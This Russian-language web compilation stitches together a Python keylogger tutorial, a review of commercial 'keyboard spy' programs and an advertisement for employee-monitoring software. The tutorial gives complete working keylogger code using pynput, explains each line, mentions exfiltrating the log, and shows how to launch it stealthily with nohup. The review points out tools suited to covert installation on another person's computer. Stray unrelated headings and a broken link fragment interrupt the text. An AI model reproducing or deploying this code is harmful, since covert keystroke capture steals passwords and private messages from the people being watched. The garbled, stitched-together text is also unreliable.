Сегодня мы будем работать над созданием кейлоггера Python . Кейлоггеры-один из самых распространенных инструментов в арсенале хакера. На самом деле они являются одним из самых основных инструментов и очень просты в изготовлении. В этом модуле мы научимся кодировать очень эффективный, но точный кейлоггер.
Установка Необходимых Библиотек
Прежде чем мы начнем, нам нужно установить определенную библиотеку, что мы можем сделать с помощью команды pip:
$ sudo pip3 install pynput
С этим покончено, мы можем продолжать писать наш код!
Реализация кейлоггера Python всего в 10 строках
from pynput.keyboard import Key, Listener import logging logging.basicConfig(filename=(«keylog.txt»), level=logging.DEBUG, format=» %(asctime)s — %(message)s») def on_press(key): logging.info(str(key)) with Listener(on_press=on_press) as listener : listener.join()
Объяснение Кода
Я не буду заставлять тебя болтаться только с кодом. Давайте разберемся, что делает каждая линия, чтобы вы были готовы построить свою собственную!
Как показывать нажатия сочетаний клавиш на экране в Windows 10
Строки 1-2: Импорт Необходимых Библиотек
from pynput.keyboard import Key, Listener import logging
Для работы нашего кода нам понадобятся следующие библиотеки:
- pynput : Это поможет нам прочитать нажатия клавиш, когда пользователь вводит данные
- logging : Это будет записывать нажатия клавиш в файл, который мы позже сможем эксфильтратировать подходящими средствами
Строка 4: Базовая конфигурация журнала
logging.basicConfig(filename=(«keylog.txt»), level=logging.DEBUG, format=» %(asctime)s — %(message)s»)
Здесь мы создаем базовую конфигурацию для системы ведения журнала. Мы указываем имя файла, в котором нажатия клавиш будут записываться как keylog.txt с последующим указанием формата, в котором будут храниться нажатия клавиш, что в данном случае будет:
YY-MM-DD HH-MM-SS(ms) — KEY
Строка 6-7: Определение нашей Функции
def on_press(key): logging.info(str(key))
Определенная здесь функция принимает аргумент, указывающий на клавишу, нажатую пользователем, и записывает его в файл после преобразования в строку.
Строка 9-10: Получение нажатий клавиш
with Listener(on_press=on_press) as listener : listener.join()
Во-первых, здесь мы создаем экземпляр прослушивателя, который будет записывать нажатия клавиш и передавать созданную нами функцию в качестве аргумента. Затем мы используем метод .join () , чтобы соединить его с основным потоком.
Таким образом, каждый раз, когда нажимается клавиша, запускается прослушиватель, и он вызывает нашу функцию, которая затем записывает ваши нажатия клавиш в файл.
Запуск Нашего Кейлоггера Python
Вы можете запустить программу с помощью:
$ python3 keylogger.py
После запуска программы мы заметим новый файл keylog.txt создан в текущем каталоге.
Эмитируем зажим кнопки W с помощью AutoHotkey
Украдкой запускаем наш кейлоггер Python
Как вы можете видеть, последний метод запуска нашего кода был не очень скрытным, поэтому, чтобы сделать его немного более эффективным, мы можем использовать следующие приемы.
В Linux/Unix
Чтобы запустить код незаметно, вы можете просто запустить его как:
$ nohup python3 keylogger.py https://pythobyte.com/python-keylogger-d96013eb/» target=»_blank»]pythobyte.com[/mask_link]
Клавиатурный шпион: обзор 10 лучших утилит для слежения
Различные шпионские программы бывают необходимы в условиях, когда к одному компьютеру имеют доступ много людей.
В этих условиях пользователь может захотеть узнать, какие сайты посещались с его компьютера (например, детьми), не происходило ли воровство с кредитных карт с помощью сохраненных паролей и т. д. для прояснения этих вопросов и потребуется клавиатурный шпион.
Наш обзор позволит вам сделать оптимальный выбор.
- Особенности выбора
- Технические характеристики
- SC-KeyLog
- WideStep Handy Keylogger
- Actual Spy
- EliteKeylogger
- The Rat!
- SPYGO
- Ardamax Keylogger 2.9
- NS Keylogger Personal Monitor 3.8
- KGB Spy
- Golden Keylogger 1.32
- Вывод
Особенности выбора
Что же такое по своей сути клавиатурный шпион? Это программа, которая, строго говоря, напрямую никак не связана с клавиатурой.
Она устанавливается в память компьютера и действует на жестком диске. Часто признаков ее деятельности не видно на компьютере, если не искать их целенаправленно.
Такая программа косвенно взаимодействует с клавиатурой, то есть работает с программой на ПК, которая преобразует сигналы, поступающие на процессор в результате нажатия кнопок, в текст при печати.
То есть, направлено действие такого софта на сбор информации, вводимой через клавиатуру.
Такие утилиты бывают разного типа – с помощью некоторых можно просмотреть весь набранный с клавиатуры текст, с помощью других – только тот, что был набран в браузере или в каком либо выбранном приложении.
Некоторые программы предоставляют возможность настройки таких показателей, другие нет.
Также они отличаются друг от друга по степени скрытности. Например, деятельность одних очевидна, на Рабочем столе остается ярлык и т. д., такие программы подойдут для контроля деятельности, например, детей.
Следы присутствия и деятельности других не заметны вовсе – они действуют скрыто и подойдут для установки на чужой компьютер, когда факт установки необходимо скрыть от стороннего пользователя.
Учитывая такое разнообразие, выбрать максимально подходящий софт может быть достаточно сложно.
В данном материале представлен ТОП лучших программ, которые можно использовать для этой цели. Среди них проще выбрать подходящую.
Технические характеристики
Для упрощения процесса выбора программного обеспечения в таблице, размещенной ниже, приведены основные сравнительные характеристики всех программ, включенных в ТОП.
| SC-KeyLog | Бесплатно | Вся | Широкий | Упрощенный |
| WideStep Handy Keylogger | Бесплатно/Платно | Вся | Широкий | Улучшенный |
| Actual Spy | Платно | Вся | Очень широкий | Стандартный |
| EliteKeylogger | Платно | Вся | Широкий | Стандартный |
| The Rat! | Бесплатно/Платно | Меньше, чем в предыдущих | Довольно широкий | Неэстетичный |
| SPYGO | Бесплатно | В зависимости от версии | В зависимости от версии | Стандартное оформление Windows |
| Ardamax Keylogger 2.9 | Бесплатно | С клавиатуры | Суженный | Упрощенный |
| NS Keylogger Personal Monitor 3.8 | Бесплатно | Вся | Суженный | Упрощенный |
| KGB Spy | Платно | С клавиатуры+ открытые программы | Узкий | Простой |
| Golden Keylogger 1.32 | Бесплатно | С клавиатуры | Очень узкий | Простой |
Основываясь на характеристиках из этой таблицы легко выбрать максимально подходящую под конкретные требования программу.
Подробнее об этих утилитах же рассказано ниже.
Источник: geek-nose.com
Кейлоггер
СпрутМонитор фиксирует все клавиши, которые нажал пользователь компьютера, записывает полученную информацию в журнал и обрабатывает ее. Также фиксируются снимки экрана и наименование приложения или сайта, где производилось действие. Вы можете использовать эту информацию например для того, чтобы предотвратить использование пользователями простых паролей, а также для контроля качества консультирования клиентов.
Возможности:
- Кейлоггер невидим для пользователя, и никак себя не выдает.
- Можно настроить кейлоггинг только для конкретных сотрудников или отделов, либо полностью его отключить.
- Весь текст, который сотрудники набирают на клавиатуре фиксируется и индексируется. С функцией «Глобальный поиск» вы без труда найдете интересующее ключевое слово в тексте, или текст, который был введен пользователем на конкретном сайте.
- СпрутМонитор сопоставляет близкие по времени события, и вы будете видеть не только текст, но и то, как выглядел экран компьютера в этот момент, какие программы были запущены, какие сайты были открыты, и даже то, что находилось в буфере обмена.
- Перехватываются клавиши, нажатые в любых программах, включая электронную почту, соцсетях, мессенджерах, и т.п. Нажатия комбинаций клавиш отображаются например как «» и «».
- С набором «Правил по-умолчанию» СпрутМонитор будет отправлять увдомления всякий раз, когда сотрудник делает скриншот нажатием клавиши PrintScreen.
Применение кейлоггера для контроля деятельности сотрудников
Использование IT-ресурсов компании не по назначению в конечном итоге приводит к снижению производительности, и негативно влияет на финансовые результаты. Вполне естественно, что простые запреты работают далеко не всегда, а нарушители с высокой долей вероятности захотят стереть данные об истории посещений, журналы действий. Важно отметить, что часто даже сам факт наличия программы-кейлогера дисциплинирует пользователей, и существенно повышает их продуктивность.
В программном комплексе СпрутМонитор реализован «клавиатурный шпион» — функционал, который сохраняет записи всех нажатых клавиш пользователем во время рабочего сеанса. Благодаря этому руководитель получает дополнительный инструмент контроля.
Клавиатурный шпион работает в фоновом режиме, не отвлекая сотрудника от исполнения основных задач, и не оказывая ощутимой нагрузки на ПК. Без знания логина и пароля администратора, просмотреть собранные данные или удалить их — невозможно.
К числу других преимуществ кейлоггера СпрутМонитор относятся:
- Запись экрана в момент нажатия клавиш позволяет четко изучить контекст события.
- Кейлоггер может предотвратить утечку информации. Например, вы можете создать правило, в котором перечислить корпоративные пароли от 1С, электронной почты и т.п., и настроить отслеживание этой информации в нажатых пользователями клавишах и соответствующее автоматическое действие. Теперь, если какой-либо сотрудник попытается хотя бы один пароль из этого списка кому-то отправить, вы получите уведомление с приложенным снимком экрана.
- Кейлоггер также может помочь улучшить качество обслуживания клиентов. СпрутМонитор может обнаружить в набранных текстах мат, неприемлимые словосочетания и т.п.
- Клавиатурный шпион также защитит от обмана DLP-системы. Большинство продуктов просто собирают информацию о нажатых клавишах, а СпрутМонитор еще и анализирует ее. Зная, что в компании установлена программа слежения, некоторые сотрудники весьма популярный «лайфхак» для иммитирования активности за компьютером, зажимая скрепкой одну из клавиш на клавиатуре. Большинство DLP-систем в таком случае будет думать, что пользователь активно работает. Но не СпрутМонитор: наш продукт успешно умеет выявлять случаи, когда пользователь зажимает как обычные клавиши так и специальные, и вы незамедлительно получите соответствующее уведомление.
Источник: sprutmonitor.ru